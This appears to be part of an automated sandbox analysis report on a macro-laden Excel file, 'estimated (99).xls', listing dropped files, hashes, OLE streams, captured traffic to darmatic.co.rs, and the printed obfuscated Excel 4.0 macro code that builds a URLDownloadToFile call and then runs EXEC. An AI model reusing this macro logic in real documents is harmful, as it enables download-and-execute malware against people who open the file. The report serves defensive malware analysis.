                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                  C:\Users\user\AppData\Local\Temp\TarE5EE.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):152788
                  Entropy (8bit):6.316654432555028
                  Encrypted:false
                  SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                  MD5:64FEDADE4387A8B92C120B21EC61E394
                  SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                  SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                  SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Mon Feb 15 22:48:42 2021, atime=Mon Feb 15 22:48:42 2021, length=12288, window=hide
                  Category:dropped
                  Size (bytes):867
                  Entropy (8bit):4.476678577461042
                  Encrypted:false
                  SSDEEP:12:85QnLgXg/XAlCPCHaXgzB8IB/IMMhX+WnicvbiubDtZ3YilMMEpxRljKZTdJP9TK:85I/XTwz6I6FYemiDv3qYrNru/
                  MD5:FE02A62BEEAEA1F9C9D0B899CF650687
                  SHA1:D4FEE9C272F5D8665BA46423FE33B2F83BA45584
                  SHA-256:9E42B5A799B57DC6B1238E891600FB87F72944643C1BC131E476B7289CE65179
                  SHA-512:4C2D74DF96E7747B462B101B132A24B33ECDBE7BEC0490AAC60E62BE1679822CB1FCE6907C1156241C7859C4E47E352C7ED58CB877ACB81519A23E67D9630EFE
                  Malicious:false
                  Reputation:low
                  Preview: L..................F...........7G....y.......y......0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....OR....Desktop.d......QK.XOR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\562258\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......562258..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\estimated (99).LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Mon Feb 15 22:48:42 2021, atime=Mon Feb 15 22:48:42 2021, length=325632, window=hide
                  Category:dropped
                  Size (bytes):2068
                  Entropy (8bit):4.551887714300889
                  Encrypted:false
                  SSDEEP:24:8xb/XTwz6IknkmemBzpDv3qYdM7dD2xb/XTwz6IknkmemBzpDv3qYdM7dV:8t/XT3IkZ9yYQh2t/XT3IkZ9yYQ/
                  MD5:A96D3D1B6000AA3A714F7CA30A364420
                  SHA1:9ABC0A9C9886A5C22C4CED4997E19EC007E456D1
                  SHA-256:EE7779C948E06AA47BD29350726079C45BA072324D5DC8607AB3EEB3783C5570
                  SHA-512:9529749DAEA9FF1843FEF18FFF0E7A76D885F7647163E4360223A10CCCEE64FFC27456713128595D020E1156F6BEC3E2B42FC9C84195931567A06E99B0E2ECEB
                  Malicious:false
                  Reputation:low
                  Preview: L..................F.... ...T.&..{....y..........................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....OR.. .ESTIMA~1.XLS..R.......Q.y.Q.y*...8.....................e.s.t.i.m.a.t.e.d. .(.9.9.)...x.l.s.......|...............-...8...[............?J......C:\Users\..#...................\\562258\Users.user\Desktop\estimated (99).xls.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.e.s.t.i.m.a.t.e.d. .(.9.9.)...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......562258..........D_....3N...W...9F.C...........[D_
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):95
                  Entropy (8bit):4.563263172107174
                  Encrypted:false
                  SSDEEP:3:oyBVomMVfNtkCYWRMENtkCmMVfNtkCv:dj6Rzk0MEzkURzks
                  MD5:5CEE92E4C0AF90E3FC4A43698C69AE1E
                  SHA1:E0E34E419508A6738C68458DBE2F29FB48556FC5
                  SHA-256:F39016E5C1D5F8ACDCCA2EF35B4B681EC731BA560A249B390B068B68C08B509C
                  SHA-512:22D621C072FF774ED8E7A24E60B063DC5E847579C7AD26619D907B2D605A2121709183858A58512059BBE984CE2B2E4A7CEF483BF0CC77294040EA610B58459B
                  Malicious:false
                  Reputation:low
                  Preview: Desktop.LNK=0..[xls]..estimated (99).LNK=0..estimated (99).LNK=0..[xls]..estimated (99).LNK=0..
                  C:\Users\user\Desktop\10EE0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Applesoft BASIC program data, first line number 16
                  Category:dropped
                  Size (bytes):379198
                  Entropy (8bit):7.261926599542817
                  Encrypted:false
                  SSDEEP:6144:dcKoSsxzNDZLDZjlbR868O8KL5L+2e32xEtjPOtioVjDGUU1qfDlavx+W2QnAFEG:ReLUIRfUI5uXL6nDJova
                  MD5:30CBF379E4470CA50EB294FC673002F7
                  SHA1:5BE04B40DDD5C05B10E3D402FB757F52D0FF05A7
                  SHA-256:EB16EC58D9429A953E1E0BE29E58304A1B0B164DD72955145E7666C71A71B6FB
                  SHA-512:C759D01FAD86518AC000D67B8473E62F3DBE438A7FB879290E5DCA2FED4177CC69A642BE6925853AC10113BAA703EC6CE5FC9568D6C34F817067A6DA0BF83750
                  Malicious:false
                  Reputation:low
                  Preview: ........g2.........................\.p.... B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...........

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 15 09:57:01 2021, Security: 0
                  Entropy (8bit):7.583974579639269
                  TrID:
                  • Microsoft Excel sheet (30009/1) 78.94%
                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                  File name:estimated (99).xls
                  File size:326144
                  MD5:48e967d6fb49bad425f2a30e9397044b
                  SHA1:f173318107c6cb325fd1271644db2a394f993f69
                  SHA256:ed67c2bce3ce33f697d5d60f73f861bdba018cd71610e5cdcc92427263fca8a1
                  SHA512:7f9bf241c46103f79bcb7d706295e1ac64183fd511df9570bc1f7cf399603d6875a6845ad348226c88ec4f8923d556826b56b259c73220d778eeff8de82280f1
                  SSDEEP:6144:EcKoSsxzNDZLDZjlbR868O8KlVH3Be3q7uDphYHceXVhca+fMHLty/xcl8uUM+lQ:GeLUIRfUI5uXL6nDJoM
                  File Content Preview:........................>.......................{...........................v...w...x...y...z..................................................................................................................................................................

                  File Icon

                  Icon Hash:e4eea286a4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "estimated (99).xls"

                  Indicators

                  Has Summary Info:True
                  Application Name:Microsoft Excel
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:True

                  Summary

                  Code Page:1251
                  Author:
                  Last Saved By:
                  Create Time:2006-09-16 00:00:00
                  Last Saved Time:2021-02-15 09:57:01
                  Creating Application:Microsoft Excel
                  Security:0

                  Document Summary

                  Document Code Page:1251
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False
                  Shared Document:False
                  Changed Hyperlinks:False
                  Application Version:917504

                  Streams

                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.337451371743
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 2 . . . . . D o c 1 . . . . . D o c 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a8 00 00 00 02 00 00 00 e3 04 00 00
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5SummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.250492291218
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 313908
                  General
                  Stream Path:Workbook
                  File Type:Applesoft BASIC program data, first line number 16
                  Stream Size:313908
                  Entropy:7.7178226629
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                  Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                  Macro 4.0 Code

                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.ARRAY(Doc3!AF23&""2 "",before.2.0.0.sheet!AD15)","=FORMULA.ARRAY(Doc2!AF3,Doc2!AE22)","=FORMULA.ARRAY(Doc2!AE3&Doc2!AE4&Doc2!AE5&Doc2!AE6&Doc2!AE7&Doc2!AE8&Doc2!AE9&Doc2!AE10&Doc2!AE11&Doc2!AE12&Doc2!AE13&Doc2!AE14&Doc2!AE15&Doc2!AE16&Doc2!AE17&Doc2!AE18&Doc2!AE19&Doc2!AE20,before.2.0.0.sheet!AF15)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AE14(),=AF14(),"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&before.2.0.0.sheet!AK22()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""U""&""R""&Doc2!AF8&""n"",Doc3!AF22&Doc3!AF21&Doc2!AD24&Doc2!AE22,""JJCCBB"",0,before.2.0.0.sheet!A100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&Doc2!AF7,0)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=Doc3!AI4(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                  ,,,=EXEC(Doc1!AD15&Doc2!AF7&Doc1!AF15),,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REPLACE(Doc2!AD25,7,7,""nloadTo"")",,,"=REPLACE(AH23,7,7,"""")",,,"=REPLACE(Doc2!AD3&Doc2!AD4&Doc2!AD5&Doc2!AD6&Doc2!AD7,7,7,""l3"")",,URL,

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 15, 2021 15:49:13.791960001 CET49167443192.168.2.22217.26.213.91
                  Feb 15, 2021 15:49:13.864586115 CET44349167217.26.213.91192.168.2.22
                  Feb 15, 2021 15:49:13.864792109 CET49167443192.168.2.22217.26.213.91
                  Feb 15, 2021 15:49:13.885714054 CET49167443192.168.2.22217.26.213.91
                  Feb 15, 2021 15:49:13.957506895 CET44349167217.26.213.91192.168.2.22
                  Feb 15, 2021 15:49:13.958545923 CET44349167217.26.213.91192.168.2.22
                  Feb 15, 2021 15:49:13.958592892 CET44349167217.26.213.91192.168.2.22
                  Feb 15, 2021 15:49:13.958631039 CET44349167217.26.213.91192.168.2.22
                  Feb 15, 2021 15:49:13.958635092 CET49167443192.168.2.22217.26.213.91
                  Feb 15, 2021 15:49:13.958659887 CET44349167217.26.213.91192.168.2.22
                  Feb 15, 2021 15:49:13.958667994 CET49167443192.168.2.22217.26.213.91
                  Feb 15, 2021 15:49:13.958676100 CET49167443192.168.2.22217.26.213.91
                  Feb 15, 2021 15:49:13.958710909 CET49167443192.168.2.22217.26.213.91
                  Feb 15, 2021 15:49:13.959661961 CET44349167217.26.213.91192.168.2.22
                  Feb 15, 2021 15:49:13.959738970 CET49167443192.168.2.22217.26.213.91
                  Feb 15, 2021 15:49:13.968462944 CET49167443192.168.2.22217.26.213.91
                  Feb 15, 2021 15:49:14.040692091 CET44349167217.26.213.91192.168.2.22
                  Feb 15, 2021 15:49:14.040833950 CET49167443192.168.2.22217.26.213.91
                  Feb 15, 2021 15:49:15.056469917 CET49167443192.168.2.22217.26.213.91
                  Feb 15, 2021 15:49:15.167438030 CET44349167217.26.213.91192.168.2.22
                  Feb 15, 2021 15:49:15.558629036 CET44349167217.26.213.91192.168.2.22
                  Feb 15, 2021 15:49:15.558676958 CET44349167217.26.213.91192.168.2.22
                  Feb 15, 2021 15:49:15.558857918 CET49167443192.168.2.22217.26.213.91
                  Feb 15, 2021 15:49:15.561418056 CET49167443192.168.2.22217.26.213.91
                  Feb 15, 2021 15:49:15.632994890 CET44349167217.26.213.91192.168.2.22

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 15, 2021 15:49:13.711478949 CET5219753192.168.2.228.8.8.8
                  Feb 15, 2021 15:49:13.768529892 CET53521978.8.8.8192.168.2.22
                  Feb 15, 2021 15:49:14.401218891 CET5309953192.168.2.228.8.8.8
                  Feb 15, 2021 15:49:14.452872992 CET53530998.8.8.8192.168.2.22
                  Feb 15, 2021 15:49:14.496109962 CET5283853192.168.2.228.8.8.8
                  Feb 15, 2021 15:49:14.545005083 CET53528388.8.8.8192.168.2.22

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Feb 15, 2021 15:49:13.711478949 CET192.168.2.228.8.8.80x1168Standard query (0)darmatic.co.rsA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Feb 15, 2021 15:49:13.768529892 CET8.8.8.8192.168.2.220x1168No error (0)darmatic.co.rs217.26.213.91A (IP address)IN (0x0001)

                  HTTPS Packets

                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                  Feb 15, 2021 15:49:13.959661961 CET217.26.213.91443192.168.2.2249167CN=darmatic.co.rs CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Jan 16 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Sat Apr 17 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                  CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                  CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                  Code Manipulations

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:15:48:40
                  Start date:15/02/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
